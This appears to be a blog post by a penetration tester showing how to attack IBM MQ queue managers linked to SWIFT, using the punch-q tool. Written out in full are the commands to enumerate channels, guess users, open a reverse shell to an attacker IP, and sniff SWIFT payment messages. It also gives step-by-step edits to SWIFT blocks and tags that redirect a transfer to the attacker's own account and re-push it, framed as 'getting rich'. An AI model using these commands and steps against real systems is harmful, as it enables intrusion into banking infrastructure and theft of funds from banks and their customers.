Attacking IBM MQ — SWIFT to Steal Money$$$

Yara AlHumaidan (0xy37)
4 min readFeb 27, 2022

--

What is IBM MQ?

It is a Message-oriented middleware, Basically, the glue between any two pieces of software that can speak MQ. e.g.: Something written in Java can exchange messages with something written in C.

Messages can be anything (SWIFT messages) SWIFT Alliance software use MQ internally as well. IBM MQ can integrate with SWIFT MQ instance.

It is detectable by nessus:

IBM MQ — Client GUI, MQ Explorer

As seen below, we have installed IBM MQ and it is using port 1414

👊 punch-q

punch-q is a small Python utility used to play with IBM MQ instances. Using punch-q, it is possible to perform security related tasks such as manipulating messages on an IBM MQ queue granting one the ability to tamper with business processes at an integration layer.

In the example below we will target a banking system — we will target SWIFT messaging queues, you can use the same technique to any other messaging system.

Enumeration

The first step is to discover channels we may be able to access on the queue manager. We can brute force available channels without any authentication because of how the queue manager responds to probes, which is implemented in the discover channels subcommand in punch-q.

./run-punchq.sh --host <target-ip> --port <target-port> discover channels

Getting Access

Next, we need to see if we can guess any credentials that may work on the discovered channels.

While there may be more undiscovered channels, the three we have this far is a good start.

Channels are often configured to be available without any authentication, and punch-q checks for that during channel enumeration.

./run-punchq.sh --host <target-ip> --port <target-port> discover users -c <CHANNEL NAME>

Getting Shell:

./run-punchq.sh --host <target-ip> --port <target-port> -U <user> -P <password> --channel <channel-name> command reverse --ip <attacker-ip> --port <attacker-port>

Getting Rich =)

As said previously, IBM MQ can integrate with SWIFT MQ instance, We will use the sub command to show the message queues themselves. has a -p flag that you should update to ‘MQ.*’ to help narrow down interesting queues you could abuse.

./run-punchq.sh --host <target-ip> --port <target-port> -U <user> -P <password> --channel <channel-name> show queues -p 'MQ.*'

With valid queues, we are now able to sniff messages, we can do so with the messages sniff subcommand.

./run-punchq.sh --host <target-ip> --port <target-port> -U <user> -P <password> --channel <channel-name> messages sniff --queue MQ.MESSAGE_IN

As shown above, this is a sniffed SWIFT message contains a money transaction.

What we can do in this case is to manipulate the messages (adding my own account number) and resend them back.

This is my bank account =) we need to gather the account number and the bank SWIFT code.

next we have to edit the sniffed messages as the following:
Block 2 : After the I103, set the Bank Identifier Code (BIC) to your bank number. This is banks SWIFT code.

Block 3: tag 121 update the uuid number with a new one. use the below command to generate new uuid:

last thing is to edit block3 tag 50K and tag 59 with your current account number.

Now we have the modified message, we can use punchq to push the message to the SWIFT network:

./run-punchq.sh --host <target-ip> --port <target-port> -U <user> -P <password> --channel <channel-name> messages push --queue 'MQ.MESSAGE_IN' -f <location of the modified message>

Now we should have some cash received to our account =)

--

--

Yara AlHumaidan (0xy37)
Yara AlHumaidan (0xy37)

Written by Yara AlHumaidan (0xy37)

Penetration Testing Consultant | OSCP | OSWP | eWAPTXv2 | CRTP

Responses (1)